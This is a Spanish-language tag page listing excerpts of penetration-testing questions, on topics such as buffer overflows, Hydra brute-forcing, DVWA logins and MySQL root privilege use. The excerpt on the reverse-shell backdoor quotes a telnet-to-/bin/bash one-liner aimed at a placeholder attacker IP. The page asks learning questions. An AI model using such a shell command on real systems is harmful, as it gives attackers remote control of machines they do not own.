Preguntas con etiqueta 'penetration-test'

1
respuesta

¿Mi comprensión de los desbordamientos de búfer es correcta?

Soy nuevo en pentesting y me pregunto si mi comprensión actual de las vulnerabilidades de desbordamiento de búfer es correcta. Suponiendo un espacio de direcciones de operación de 3 direcciones, un espacio de instrucciones de 2 direcciones y un...
hecha 25.02.2016 - 16:24
1
respuesta

¿Cómo es posible que una aplicación se conecte a la dirección IP 0.0.0.142? [cerrado]

Reviso regularmente las conexiones que se establecen desde las aplicaciones en mi teléfono a los servicios externos. Últimamente, encontré que Facebook se conectaba a 0.0.0.142. Así que borré la aplicación de Facebook para Android. Ahora, acabo...
hecha 29.09.2015 - 15:44
1
respuesta

Pros / Contras del departamento de pentest interno versus pentesters externos

¿Cuáles son las ventajas y desventajas de tener un departamento interno de pentest en una empresa grande en comparación con los proveedores de servicios externos?     
hecha 13.10.2014 - 21:32
1
respuesta

Reversa la puerta trasera de la carcasa

¿Por qué este ejemplo de puerta trasera inversa requiere dos escuchas? El Oyente está usando el comando nc (nc -l). telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b> Aunque el ejemplo a contin...
hecha 31.10.2014 - 08:57
1
respuesta

Hydra da respuestas incorrectas

Problema: Hydra siempre me da contraseñas incorrectas cada vez. Estoy utilizando la fuerza bruta a través de Hydra para adivinar la contraseña correcta en un sitio web determinado. Primero que todo, utilicé BurpSuite para interceptar la solic...
hecha 25.11.2013 - 12:52
1
respuesta

Ayudando a los desarrolladores a encontrar fallas de lógica y autorización

Los evaluadores de penetración profesionales suelen ser buenos para encontrar todo tipo de vulnerabilidades, incluidas fallas lógicas, que son muy específicas del sitio que se está probando. Sin embargo, al ser una actividad manual, las pruebas...
hecha 29.10.2013 - 15:59
3
respuestas

¿Cómo protege SSL contra ataques de nivel de red en la integridad?

Me gustaría saber si hay alguna forma de demostrar cómo un atacante puede atacar la integridad de un sitio web debido a una conexión no cifrada y cómo SSL evitará esto. Para el aspecto de la confidencialidad, el siguiente ejemplo explica: Cua...
hecha 15.09.2013 - 14:44
2
respuestas

Explorar el backend de Novell NetWare con servidores y clientes de Windows

¿Alguien podría proporcionar alguna información sobre cómo realizar una evaluación de vulnerabilidad interna con respecto a Novell NetWare como el servidor con estaciones de trabajo cliente y servidores que ejecutan varias versiones de Windows?...
hecha 15.11.2011 - 16:42
1
respuesta

No se puede iniciar sesión en dvwa con un programa Python simple, aunque las credenciales de inicio de sesión son buenas

import requests target_url = "http://127.0.0.1/dvwa/login.php" data_dict = {"csrfmiddlewaretoken": "bbbfeed6e1aea50f14a51a331054022c", "username": "admin", "password": "password", "Login": "Submit"} response = requests.post(target_url, data=data...
hecha 02.11.2018 - 18:24
1
respuesta

Usando la cuenta de root mysql para ejecutar comandos de root

Supongamos que tengo acceso root completo a las bases de datos mysql, pero no al shell del usuario root (linux). ¿Cómo puedo usar el acceso de root completo a las bases de datos mysql para ejecutar comandos de root?     
hecha 26.09.2012 - 14:14